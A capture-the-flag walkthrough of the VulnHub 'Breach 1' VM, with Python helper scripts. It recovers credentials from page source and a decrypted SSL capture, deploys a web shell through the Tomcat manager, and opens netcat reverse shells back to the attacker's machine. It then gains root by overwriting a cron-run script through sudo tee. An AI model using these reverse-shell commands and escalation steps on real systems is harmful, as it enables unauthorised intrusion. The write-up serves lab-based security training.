[VULNHUB] Breach 1

This is the first VM of a series. It was really interesting and fun!

PART ONE

First of all I ran an nmap scan, but I don't reproduce the output here because it reported 65389 open ports, which is really strange. When almost every port shows up as open, the port state tells you nothing; look at which ports actually answer with a real service instead. Port 80 was among them, so I checked whether a website was running on the VM: I browsed to http://192.168.110.140 and the site appeared. Looking at the page source I found this:

<!------ Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

It looks like a base64-encoded string, so I decoded it; this was the result:

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh

Another base64-encoded string. I decoded it again and finally found something interesting:

pgibbons:damnitfeel$goodtobeagang$ta

A username and a password; maybe they will be useful later. Before going further I scanned the website with dirbuster to find directories and found /images, which contains several images. I downloaded all of them and checked with exiftool whether they carried any interesting metadata: the image bill.png has coffeestains as a comment. Clicking on the image at the centre of the home page redirects to another page from which I can reach the Employee Portal. I needed to log in, so I tried the credentials recovered from the page source and they worked!

PART TWO

The next step is to analyze the portal. First of all I noticed that there were 3 unread messages in the user's inbox, so I read them. The first one was sent by the admin, who says that all sensitive information should be posted in the admin portal. The second and the third talk about the purchase of an IDS/IPS system, and I found a link to the keystore: http://192.168.110.140/.keystore. I downloaded it because it is really important. Then I switched to the "View Account" section and discovered a comment by this user (Peter Gibbons) titled "SSL implementation test capture". It links to a .pcap file, http://192.168.110.140/impresscms/_SSL_test_phase1.pcap, so I downloaded it as well. A useful piece of information in the comment is this:

They told me the alias, storepassword and keypassword are all set to 'tomcat'.

Remember the .keystore file? With it I can extract the server's private key and decrypt the captured traffic. The keystore is in Java's JKS format, so I convert it to PKCS12 and pull out the tomcat entry (the command assumes the downloaded file was saved as keystore):

keytool -importkeystore -srckeystore keystore -destkeystore key.p12 -deststoretype PKCS12 -srcalias tomcat

keytool asks for the destination keystore password (I used tomcat again) and the source keystore password (tomcat), and writes key.p12, which holds the private key. Now open Wireshark, go to Preferences, and under Protocols select SSL (called TLS in current versions). Click Edit... next to "RSA keys list", press +, and fill in the fields: IP address 192.168.110.140, Port 8443, Protocol http, Key File the key.p12 you just exported, Password tomcat. Press OK and open the .pcap file. If everything is correct you should see the Client Hello; right-click it and follow the SSL stream. Note that this only works because the capture uses an RSA key-exchange cipher suite, where the client encrypts the pre-master secret with the server's public key; with (EC)DHE suites the server's private key alone cannot recover the session keys. In the stream I saw that a user tried to log in to /_M@nag3Me/html with tomcat:Tt\5D8F(#!*u=G)4m7zB as username and password, which I obtained by decoding the Basic Authorization header of the GET request. So browse to https://192.168.110.140:8443/_M@nag3Me/html, use the credentials discovered above, and you are logged in to the Tomcat manager.
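Both decoding steps in this part, the nested base64 in the HTML comment from Part One and the Basic Authorization header in the decrypted request, are easy to do by hand, but a small script makes the layering explicit and avoids copy errors on long strings. The following Python is an added example and not part of the original writeup: the comment string is the one from the page source, while the HTTP request is a constructed stand-in for what Wireshark showed, with the Authorization value built from the credential reported above.

```python
import base64
import binascii
import re
import string

# Inputs reconstructed from the walkthrough (constructed here, not captured live).
HTML_COMMENT = "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo"

# Minimal stand-in for the request seen in the decrypted SSL stream; only the
# Authorization header matters and its value is built from the reported credential.
CAPTURED_REQUEST = (
    "GET /_M@nag3Me/html HTTP/1.1\r\n"
    "Host: 192.168.110.140:8443\r\n"
    "Authorization: Basic "
    + base64.b64encode(rb"tomcat:Tt\5D8F(#!*u=G)4m7zB").decode()
    + "\r\n\r\n"
)

_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
_PRINTABLE = set(string.printable.encode())


def looks_like_base64(s: str) -> bool:
    """Syntactic check only: alphabet, padding and length must all be consistent."""
    return bool(_B64_RE.match(s)) and len(s) % 4 == 0


def decode_printable(s: str):
    """Decode one base64 layer; return text, or None if the bytes are not clean ASCII."""
    try:
        raw = base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw or any(b not in _PRINTABLE for b in raw):
        return None
    return raw.decode("ascii")


def peel_base64(blob: str, max_layers: int = 10):
    """Decode repeatedly until the output stops looking like base64.

    Returns every intermediate layer so the chain is visible; the last element
    is the innermost plaintext. A ':' or '$' in the result ends the loop
    naturally because neither character is in the base64 alphabet.
    """
    layers = []
    current = blob.strip()
    for _ in range(max_layers):
        if not looks_like_base64(current):
            break
        decoded = decode_printable(current)
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    return layers


def extract_basic_auth(raw_request: str):
    """Pull (user, password) out of an HTTP Basic Authorization header.

    Per RFC 7617 the decoded value is user ':' password, split on the FIRST
    colon, so passwords containing ':' survive. Returns None if absent.
    """
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "authorization":
            continue
        scheme, _, token = value.strip().partition(" ")
        if scheme.lower() != "basic":
            continue
        try:
            cred = base64.b64decode(token.strip(), validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            return None
        user, sep2, password = cred.partition(":")
        return (user, password) if sep2 else None
    return None


if __name__ == "__main__":
    for depth, layer in enumerate(peel_base64(HTML_COMMENT), start=1):
        print(f"layer {depth}: {layer}")
    print("tomcat manager credential:", extract_basic_auth(CAPTURED_REQUEST))
```

The base64 check is deliberately syntactic: the loop stops as soon as a layer contains a character outside the alphabet, which is exactly what happens when the credential with its ':' and '$' appears, so the script needs no prior knowledge of how many layers there are.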

PART THREE

Now it's time to get a shell. I can simply deploy a .war file (I used the one from laudanum). Once cmd.war was uploaded I browsed to https://192.168.110.140:8443/_M@nag3Me/cmd/cmd.jsp. Then I started a listener locally:

sudo nc -lvp 1234

Then, from the web shell on the Tomcat server, I executed the following command (the -e option requires a netcat build that supports it, such as netcat-traditional or ncat):
nc 192.168.110.2 1234 -e /bin/bash

That gave me a reverse shell (nc connects back to my listener), but I needed a TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Perfect, now I started to analyze the server. First of all I looked in /home to see which users exist: blumbergh and milton. Remember the comment I found in an image with exiftool? Maybe it is the password of one of these users. I tried to switch to blumbergh with coffeestains as the password and it worked! Now I need to escalate my privileges, so first I checked what the user can run as root:

sudo -l

This is the output:

(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

Let’s check what tidyup.sh is:

cat /usr/share/cleanup/tidyup.sh

This is the important part:

#This script is set to run every 3 minutes as an additional defense measure against hackers.

The script runs as root from cron, and sudo lets me write exactly that file as root with tee, so together they are code execution: I put a reverse shell in a temporary file, cat it, and pipe it through tee into the script. Note that tee without -a truncates the target, so the whole script is replaced by my one-liner. Create the payload:

echo "nc 192.168.110.2 1235 -e /bin/bash" > /tmp/shell

And perform the trick:

cat /tmp/shell | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

Now listen locally:

sudo nc -lvp 1235
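The sudo -l entry above is a classic file-write primitive: tee runs as root and the file it writes is executed by root every three minutes. On a box with more than one entry it pays to triage them all rather than eyeballing the listing. The following Python is an added example and not part of the original writeup: it parses a constructed sudo -l listing (the tee line is the one found on the VM; the other two entries are invented to exercise the other classifications) and labels each entry by the kind of primitive it exposes. The binary sets are my own starting point, not an exhaustive catalogue.

```python
import os
import re
import shlex

# Constructed sample of `sudo -l` output. The tee entry is the one found on the
# VM; the other two entries are invented to show the remaining classifications.
SAMPLE_SUDO_L = """\
Matching Defaults entries for blumbergh on Breach:
    env_reset, mail_badpass

User blumbergh may run the following commands on Breach:
    (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
    (root) NOPASSWD: /usr/bin/systemctl restart nginx
    (ALL) ALL
"""

# Binaries whose normal job is to write a file the caller names.
WRITE_PRIMITIVES = {"tee", "cp", "mv", "dd", "install", "sed", "vi", "vim", "nano"}
# Binaries that can hand the caller a shell or run arbitrary code directly.
SHELL_PRIMITIVES = {"sh", "bash", "dash", "zsh", "python", "python3", "perl",
                    "ruby", "env", "find", "awk", "less", "more", "man"}

# "(runas) TAG: TAG: command"; runas may be "root", "ALL" or "user : group".
ENTRY_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<command>.+)$")


def parse_sudo_entries(text: str):
    """Return one dict per command entry; header and Defaults lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if not m:
            continue
        tags = m.group("tags").replace(":", " ").split()
        entries.append({"runas": m.group("runas").strip(),
                        "tags": tags,
                        "command": m.group("command").strip()})
    return entries


def assess(entry: dict):
    """Classify one entry as (severity, reason)."""
    runas, cmd = entry["runas"], entry["command"]
    if cmd.upper() == "ALL":
        return ("critical", f"any command as {runas}")
    argv = shlex.split(cmd)
    binary, args = os.path.basename(argv[0]), argv[1:]
    if binary in WRITE_PRIMITIVES:
        # sudo matches listed arguments exactly, so the target is fixed; the
        # question is whether root later executes or trusts that file.
        target = args[-1] if args else "any file the user names"
        return ("high", f"{binary} overwrites {target} as {runas}; "
                        "code execution if root runs or sources that file")
    if binary in SHELL_PRIMITIVES:
        return ("high", f"{binary} can spawn a shell or run code as {runas}")
    if not args:
        # No arguments listed means sudo allows ANY arguments to this binary.
        return ("medium", f"{binary} with caller-chosen arguments as {runas}")
    return ("info", f"{binary} with fixed arguments as {runas}")


def audit(text: str):
    """Return (severity, command, reason) for each entry, in listing order."""
    findings = []
    for entry in parse_sudo_entries(text):
        severity, reason = assess(entry)
        findings.append((severity, entry["command"], reason))
    return findings


if __name__ == "__main__":
    for severity, command, reason in audit(SAMPLE_SUDO_L):
        print(f"[{severity:8}] {command}\n           {reason}")
```

The "medium" case is the one people miss: a sudoers rule that names a binary without arguments lets the user pass any arguments they like, so even a harmless-looking tool needs checking, whereas a rule with arguments listed is matched exactly and the target is fixed, which is why the tee entry here is dangerous only in combination with the cron job that executes tidyup.sh.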

And wait for the shell; cron fires the script within three minutes. Once you have it, go to /root and list the files:

ls -al

There is a .flag.txt file, just cat it:

cat .flag.txt

VM rooted and completed!
